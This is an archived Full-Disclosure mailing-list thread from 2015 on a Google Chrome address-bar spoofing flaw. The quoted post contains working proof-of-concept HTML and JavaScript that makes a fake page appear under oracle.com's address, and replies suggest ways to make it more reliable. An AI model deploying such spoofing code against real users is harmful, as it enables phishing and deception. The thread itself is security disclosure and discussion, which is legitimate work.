lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <14FBDFC5-67A0-4C57-9DC7-DC71E313A0A0@owasp.org> Date: Thu, 2 Jul 2015 19:17:20 -0400 From: Daniel Wood <daniel.wood@...sp.org> To: Mustafa Al-Bassam <mus@...albas.com> Cc: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>, "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>, "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Subject: Re: [FD] Google Chrome Address Spoofing (Request For Comment) Yes this is a pretty good find. I can also confirm it works on iOS 8.3 (12F69) with Safari. DW Sent from my iPad > On Jul 2, 2015, at 9:33 AM, Mustafa Al-Bassam <mus@...albas.com> wrote: > > That's pretty neat. Played around with this and made a few discoveries. > > 1. It shows a valid certificate when you spoof HTTPS sites. That's really bad. POC/screenshot: https://github.com/musalbas/address-spoofing-poc > > 2. The page isn't responsive when using this flaw. That means you can't spoof a login box for example. (I tried.) > > 3. The success of the exploit seems to depend on if the browser can start loading content.html fast enough. I noticed that the exploit works 100% of the time when used locally. Perhaps a better version of the exploit would somehow preload content.html - for example by opening a window with an URL that starts with javascript: followed by a script to display the content? That, or perhaps reducing the interval time for trying to run next() after the popup is created. > > I wonder if this works on any other browsers? > > MustafaOn 30 Jun 2015 7:08 am, David Leo <david.leo@...sen.co.uk> wrote: >> >> Impact: >> The "click to verify" thing is completely broken... >> Anyone can be "BBB Accredited Business" etc. >> You can make whitehouse.gov display "We love Islamic State" :-) >> >> Note: >> No user interaction on the fake page. >> >> Code: >> ***** index.html >> <script> >> function next() >> { >> w.location.replace('http://www.oracle.com/index.html?'+n);n++; >> setTimeout("next();",15); >> setTimeout("next();",25); >> } >> function f() >> { >> w=window.open("content.html","_blank","width=500 height=500"); >> i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5); >> } >> </script> >> <a href="#" onclick="f()">Go</a><br> >> ***** content.html >> <b>This web page is NOT oracle.com</b> >> <script>location="http://www.oracle.com/index.html";</script> >> ***** It's online >> http://www.deusen.co.uk/items/gwhere.6128645971389012/ >> (The page says "June/16/2015" - it works as we tested today) >> >> Request For Comment: >> We reported this to Google. >> They reproduced, and say >> It's DoS which doesn't matter. >> We think it's very strange, >> since the browser does not crash(not DoS), >> and the threat is obvious. >> What's your opinion? >> >> Kind Regards, >> >> PS >> We love clever tricks. >> We love this: >> http://dieyu.org/ >> >> >> _______________________________________________ >> Sent through the Full Disclosure mailing list >> https://nmap.org/mailman/listinfo/fulldisclosure >> Web Archives & RSS: http://seclists.org/fulldisclosure/ > > _______________________________________________ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists